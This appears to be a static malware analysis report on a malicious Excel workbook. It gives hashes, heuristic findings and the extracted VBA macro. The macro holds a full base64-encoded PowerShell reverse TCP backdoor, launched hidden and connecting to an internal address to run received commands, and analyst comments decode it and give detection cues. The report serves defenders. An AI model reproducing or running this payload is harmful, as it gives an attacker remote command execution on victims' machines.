Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7727216d59d3b268…

MALICIOUS

Office (OOXML)

83.3 KB · Created: 2021-11-02 02:43:16 UTC · Authoring application: Microsoft Excel 15.0300 · First seen: 2021-11-20
MD5: 5624e572577eb4582fa1e2a90f8ea07f · SHA-1: cfc74296dd69f579809a3fcb9ce8933a4bee56c4 · SHA-256: 7727216d59d3b2682f3be6da7abfdb27dcbbb2d774585a58d4bbdac5c2c93d65
Risk score: 100

Heuristics (3)

  • VBA project inside OOXML — severity: medium — 1 related finding — rule OOXML_VBA
    Document contains a VBA project (VBA macros present)
  • PowerShell reference in VBA — severity: critical — rule OLE_VBA_PS
    PowerShell reference found in the VBA source
    Matched lines in the script:
    Dim str As String
    str = str + "powershell.exe -nop -w hidden -e VwByAGkAdABlAC0AS"
    str = str + "ABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA"
  • External relationship — severity: medium — rule OOXML_EXTERNAL_REL
    External target in xl/externalLinks/_rels/externalLink2.xml.rels: Ginno_BCC tháng 6.xls

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas · vba-macro · oletools.olevba.extract_macros (decoded VBA source from OOXML) · 10544 bytes
SHA-256: 7666174d91cc5b7d184523e0f96c4a3b2a98acbffaf55d7a49630f9e0d3a1065
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Module1: standard code module as extracted by olevba. The Attribute line is
' VBA project metadata (the module name), not an executable statement.
' Macro1 — the only procedure in the extracted VBA project.
' It assembles a single string, str, from 149 short literals (the value is
' split into ~50-character pieces, which defeats naive substring matching on
' the full command line). The assembled value begins
'   powershell.exe -nop -w hidden -e <base64>
' i.e. a PowerShell launch with no profile, a hidden window and an
' -EncodedCommand payload (base64 over UTF-16LE).
' Within this listing the string is only built: no Shell / WScript.Shell /
' CreateObject call that would execute it appears between Sub and End Sub,
' and no Auto_Open / Workbook_Open trigger is present in the other modules.
' Whether it is ever launched cannot be determined from this source alone.
' Decoded, the payload is the publicly available "PowerShell Reverse TCP v3.5"
' script (its banner names the author and a GitHub path): it opens a
' Net.Sockets.TcpClient to 10.1.110.11 port 8889, reads commands from the
' socket, runs each with Invoke-Expression and writes the output back.
' Detection notes: an Office process spawning powershell.exe with
' "-nop -w hidden -e"; outbound TCP from Excel/PowerShell to 10.1.110.11:8889
' (an RFC 1918 address, so the intended peer sits inside a private network).
Sub Macro1()
Attribute Macro1.VB_ProcData.VB_Invoke_Func = " \n14"
' Excel macro-option metadata recorded for Macro1 (shortcut-key / description
' slot); presumably not an auto-run trigger — confirm against the project.
Dim str As String
' VBA initialises a String to "", so the first str + "..." is well defined.
' --- decoded: banner of Write-Host lines (tool name, author, repository) ---
str = str + "powershell.exe -nop -w hidden -e VwByAGkAdABlAC0AS"
str = str + "ABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA"
str = str + "jACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjA"
str = str + "CMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACM"
str = str + "AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAI"
str = str + "wAjACMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwB"
str = str + "yAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABQAG8"
str = str + "AdwBlAHIAUwBoAGUAbABsACAAUgBlAHYAZQByAHMAZQAgAFQAQ"
str = str + "wBQACAAdgAzAC4ANQAgACAAIAAgACAAIAAgACAAIAAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGkAdABlAC0ASABvA"
str = str + "HMAdAAgACIAIwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIABiAHkAIABJAHYAYQBuACAAUwB"
str = str + "pAG4AYwBlAGsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGk"
str = str + "AdABlAC0ASABvAHMAdAAgACIAIwAgAEcAaQB0AEgAdQBiACAAc"
str = str + "gBlAHAAbwBzAGkAdABvAHIAeQAgAGEAdAAgAGcAaQB0AGgAdQB"
str = str + "iAC4AYwBvAG0ALwBpAHYAYQBuAC0AcwBpAG4AYwBlAGsALwBwA"
str = str + "G8AdwBlAHIAcwBoAGUAbABsAC0AcgBlAHYAZQByAHMAZQAtAHQ"
str = str + "AYwBwAC4AIAAgACMAIgA7AAoAVwByAGkAdABlAC0ASABvAHMAd"
str = str + "AAgACIAIwAgAEYAZQBlAGwAIABmAHIAZQBlACAAdABvACAAZAB"
str = str + "vAG4AYQB0AGUAIABiAGkAdABjAG8AaQBuACAAYQB0ACAAMQBCA"
str = str + "HIAWgBNADYAVAA3AEcAOQBSAE4AOAB2AGIAYQBiAG4AZgBYAHU"
str = str + "ANABNADYATABwAGcAegB0AHEANgBZADEANAAuACAAIAAgACMAI"
str = str + "gA7AAoAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIwAgACAAIAA"
str = str + "gACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgA"
str = str + "CAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACA"
str = str + "AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAI"
str = str + "AAgACAAIAAgACAAIAAgACAAIAAgACMAIgA7AAoAVwByAGkAdAB"
str = str + "lAC0ASABvAHMAdAAgACIAIwAjACMAIwAjACMAIwAjACMAIwAjA"
str = str + "CMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACM"
str = str + "AIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAI"
str = str + "wAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwAjACMAIwA"
' --- decoded (from about here): $client/$stream/$buffer/$writer/$data/$result
'     initialised to $null, then New-Object Net.Sockets.TcpClient("10.1.110.11", 8889),
'     GetStream(), a 1024-byte buffer, ASCII encoding and an auto-flushing StreamWriter ---
str = str + "jACMAIwAjACMAIgA7AAoAJABjAGwAaQBlAG4AdAAgAD0AIAAkA"
str = str + "G4AdQBsAGwAOwAKACQAcwB0AHIAZQBhAG0AIAA9ACAAJABuAHU"
str = str + "AbABsADsACgAkAGIAdQBmAGYAZQByACAAPQAgACQAbgB1AGwAb"
str = str + "AA7AAoAJAB3AHIAaQB0AGUAcgAgAD0AIAAkAG4AdQBsAGwAOwA"
str = str + "KACQAZABhAHQAYQAgAD0AIAAkAG4AdQBsAGwAOwAKACQAcgBlA"
str = str + "HMAdQBsAHQAIAA9ACAAJABuAHUAbABsADsACgB0AHIAeQAgAHs"
str = str + "ACgAJACMAIABjAGgAYQBuAGcAZQAgAHQAaABlACAAaABvAHMAd"
str = str + "AAgAGEAZABkAHIAZQBzAHMAIABhAG4AZAAvAG8AcgAgAHAAbwB"
str = str + "yAHQAIABuAHUAbQBiAGUAcgAgAGEAcwAgAG4AZQBjAGUAcwBzA"
str = str + "GEAcgB5AAoACQAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0"
str = str + "ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFMAbwBjAGsAZQB0AHMAL"
str = str + "gBUAGMAcABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAuADEAMQA"
str = str + "wAC4AMQAxACIALAAgADgAOAA4ADkAKQA7AAoACQAkAHMAdAByA"
str = str + "GUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQ"
str = str + "AcgBlAGEAbQAoACkAOwAKAAkAJABiAHUAZgBmAGUAcgAgAD0AI"
str = str + "ABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAA"
str = str + "xADAAMgA0ADsACgAJACQAZQBuAGMAbwBkAGkAbgBnACAAPQAgA"
str = str + "E4AZQB3AC0ATwBiAGoAZQBjAHQAIABUAGUAeAB0AC4AQQBzAGM"
str = str + "AaQBpAEUAbgBjAG8AZABpAG4AZwA7AAoACQAkAHcAcgBpAHQAZ"
str = str + "QByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgB"
str = str + "TAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhA"
str = str + "G0AKQA7AAoACQAkAHcAcgBpAHQAZQByAC4AQQB1AHQAbwBGAGw"
str = str + "AdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsACgAJAFcAcgBpAHQAZ"
str = str + "QAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvAG8AcgAgAGkAcwA"
str = str + "gAHUAcAAgAGEAbgBkACAAcgB1AG4AbgBpAG4AZwAuAC4ALgAiA"
str = str + "DsACgAJAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiACIAOwAKAAk"
' --- decoded (from about here): receive/execute loop — writes a "PS>" prompt,
'     reads from $stream into the buffer while DataAvailable, trims $data, runs
'     Invoke-Expression -Command $data 2>&1 | Out-String, and writes $result
'     back in buffer-sized slices; loop ends when a read returns 0 bytes ---
str = str + "AJABiAHkAdABlAHMAIAA9ACAAMAA7AAoACQBkAG8AIAB7AAoAC"
str = str + "QAJACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUAKAAiAFAAUwA"
str = str + "+ACIAKQA7AAoACQAJAGQAbwAgAHsACgAJAAkACQAkAGIAeQB0A"
str = str + "GUAcwAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQ"
str = str + "AYgB1AGYAZgBlAHIALAAgADAALAAgACQAYgB1AGYAZgBlAHIAL"
str = str + "gBMAGUAbgBnAHQAaAApADsACgAJAAkACQBpAGYAIAAoACQAYgB"
str = str + "5AHQAZQBzACAALQBnAHQAIAAwACkAIAB7AAoACQAJAAkACQAkA"
str = str + "GQAYQB0AGEAIAA9ACAAJABkAGEAdABhACAAKwAgACQAZQBuAGM"
str = str + "AbwBkAGkAbgBnAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAd"
str = str + "QBmAGYAZQByACwAIAAwACwAIAAkAGIAeQB0AGUAcwApADsACgA"
str = str + "JAAkACQB9AAoACQAJAH0AIAB3AGgAaQBsAGUAIAAoACQAcwB0A"
str = str + "HIAZQBhAG0ALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACk"
str = str + "AOwAKAAkACQBpAGYAIAAoACQAYgB5AHQAZQBzACAALQBnAHQAI"
str = str + "AAwACkAIAB7AAoACQAJAAkAJABkAGEAdABhACAAPQAgACQAZAB"
str = str + "hAHQAYQAuAFQAcgBpAG0AKAApADsACgAJAAkACQBpAGYAIAAoA"
str = str + "CQAZABhAHQAYQAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACk"
str = str + "AIAB7AAoACQAJAAkACQB0AHIAeQAgAHsACgAJAAkACQAJAAkAJ"
str = str + "AByAGUAcwB1AGwAdAAgAD0AIABJAG4AdgBvAGsAZQAtAEUAeAB"
str = str + "wAHIAZQBzAHMAaQBvAG4AIAAtAEMAbwBtAG0AYQBuAGQAIAAkA"
str = str + "GQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHI"
str = str + "AaQBuAGcAOwAKAAkACQAJAAkAfQAgAGMAYQB0AGMAaAAgAHsAC"
str = str + "gAJAAkACQAJAAkAJAByAGUAcwB1AGwAdAAgAD0AIAAkAF8ALgB"
str = str + "FAHgAYwBlAHAAdABpAG8AbgAgAHwAIABPAHUAdAAtAFMAdAByA"
str = str + "GkAbgBnADsACgAJAAkACQAJAH0ACgAJAAkACQAJAEMAbABlAGE"
str = str + "AcgAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgACIAZ"
str = str + "ABhAHQAYQAiADsACgAJAAkACQAJACQAbABlAG4AZwB0AGgAIAA"
str = str + "9ACAAJAByAGUAcwB1AGwAdAAuAEwAZQBuAGcAdABoADsACgAJA"
str = str + "AkACQAJAGkAZgAgACgAJABsAGUAbgBnAHQAaAAgAC0AZwB0ACA"
str = str + "AMAApACAAewAKAAkACQAJAAkACQAkAGMAbwB1AG4AdAAgAD0AI"
str = str + "AAwADsACgAJAAkACQAJAAkAZABvACAAewAKAAkACQAJAAkACQA"
str = str + "JAGkAZgAgACgAJABsAGUAbgBnAHQAaAAgAC0AZwBlACAAJABiA"
str = str + "HUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAIAB7ACAAJABiAHk"
str = str + "AdABlAHMAIAA9ACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAd"
str = str + "ABoADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAGIAeQB0AGUAcwA"
str = str + "gAD0AIAAkAGwAZQBuAGcAdABoADsAIAB9AAoACQAJAAkACQAJA"
str = str + "AkAJAB3AHIAaQB0AGUAcgAuAFcAcgBpAHQAZQAoACQAcgBlAHM"
str = str + "AdQBsAHQALgBzAHUAYgBzAHQAcgBpAG4AZwAoACQAYwBvAHUAb"
str = str + "gB0ACwAIAAkAGIAeQB0AGUAcwApACkAOwAKAAkACQAJAAkACQA"
str = str + "JACQAYwBvAHUAbgB0ACAAKwA9ACAAJABiAHkAdABlAHMAOwAKA"
str = str + "AkACQAJAAkACQAJACQAbABlAG4AZwB0AGgAIAAtAD0AIAAkAGI"
str = str + "AeQB0AGUAcwA7AAoACQAJAAkACQAJAH0AIAB3AGgAaQBsAGUAI"
str = str + "AAoACQAbABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQA7AAoACQA"
str = str + "JAAkACQAJAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgA"
str = str + "C0ATgBhAG0AZQAgACIAcgBlAHMAdQBsAHQAIgA7AAoACQAJAAk"
str = str + "ACQB9AAoACQAJAAkAfQAKAAkACQB9AAoACQB9ACAAdwBoAGkAb"
str = str + "ABlACAAKAAkAGIAeQB0AGUAcwAgAC0AZwB0ACAAMAApADsACgA"
' --- decoded (from about here): "Backdoor will now exit..." message, catch
'     block printing the inner-exception message, then finally: Close/Dispose
'     of writer, stream and client, Clear-Variable on each, [System.GC]::Collect() ---
str = str + "JAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAEIAYQBjAGsAZABvA"
str = str + "G8AcgAgAHcAaQBsAGwAIABuAG8AdwAgAGUAeABpAHQALgAuAC4"
str = str + "AIgA7AAoAfQAgAGMAYQB0AGMAaAAgAHsACgAJAFcAcgBpAHQAZ"
str = str + "QAtAEgAbwBzAHQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgA"
str = str + "uAEkAbgBuAGUAcgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzA"
str = str + "HMAYQBnAGUAOwAKAH0AIABmAGkAbgBhAGwAbAB5ACAAewAKAAk"
str = str + "AaQBmACAAKAAkAHcAcgBpAHQAZQByACAALQBuAGUAIAAkAG4Ad"
str = str + "QBsAGwAKQAgAHsACgAJAAkAJAB3AHIAaQB0AGUAcgAuAEMAbAB"
str = str + "vAHMAZQAoACkAOwAKAAkACQAkAHcAcgBpAHQAZQByAC4ARABpA"
str = str + "HMAcABvAHMAZQAoACkAOwAKAAkACQBDAGwAZQBhAHIALQBWAGE"
str = str + "AcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAHcAcgBpAHQAZ"
str = str + "QByACIAOwAKAAkAfQAKAAkAaQBmACAAKAAkAHMAdAByAGUAYQB"
str = str + "tACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgAJAAkAJABzA"
str = str + "HQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAKAAkACQAkAHM"
str = str + "AdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwAKAAkAC"
str = str + "QBDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQB"
str = str + "tAGUAIAAiAHMAdAByAGUAYQBtACIAOwAKAAkAfQAKAAkAaQBmA"
str = str + "CAAKAAkAGMAbABpAGUAbgB0ACAALQBuAGUAIAAkAG4AdQBsAGw"
str = str + "AKQAgAHsACgAJAAkAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZ"
str = str + "QAoACkAOwAKAAkACQAkAGMAbABpAGUAbgB0AC4ARABpAHMAcAB"
str = str + "vAHMAZQAoACkAOwAKAAkACQBDAGwAZQBhAHIALQBWAGEAcgBpA"
str = str + "GEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGMAbABpAGUAbgB0ACI"
str = str + "AOwAKAAkAfQAKAAkAaQBmACAAKAAkAGIAdQBmAGYAZQByACAAL"
str = str + "QBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgAJAAkAJABiAHUAZgB"
str = str + "mAGUAcgAuAEMAbABlAGEAcgAoACkAOwAKAAkACQBDAGwAZQBhA"
str = str + "HIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGI"
str = str + "AdQBmAGYAZQByACIAOwAKAAkAfQAKAAkAaQBmACAAKAAkAHIAZ"
str = str + "QBzAHUAbAB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsACgA"
str = str + "JAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOA"
str = str + "GEAbQBlACAAIgByAGUAcwB1AGwAdAAiADsACgAJAH0ACgAJAGk"
str = str + "AZgAgACgAJABkAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAK"
str = str + "QAgAHsACgAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbAB"
str = str + "lACAALQBOAGEAbQBlACAAIgBkAGEAdABhACIAOwAKAAkAfQAKA"
str = str + "AkAWwBTAHkAcwB0AGUAbQAuAEcAQwBdADoAOgBDAG8AbABsAGU"
str = str + "AYwB0ACgAKQA7AAoAfQAKAA=="
' str is complete here but is never passed to Shell, CreateObject or any
' other call in this procedure; the sub returns without using it.
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' ThisWorkbook document module: only project metadata was extracted (VB_Base
' is the usual Excel workbook-object class GUID). No Workbook_Open or other
' event handler is present, so this module provides no automatic execution
' path for Macro1 as far as the extracted source shows.

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Sheet1 worksheet module: metadata only (VB_Base is the usual Excel
' worksheet-object class GUID). No Worksheet_* event handler is present in the
' extracted source, so nothing here triggers Macro1 either.
vbaProject_00.bin · vba-project · OOXML VBA project: xl/vbaProject.bin · 27648 bytes
SHA-256: d454e365ad2d972d7d70df1a45e7cced71adc0cef9401c4554ad8027a8ad7ddd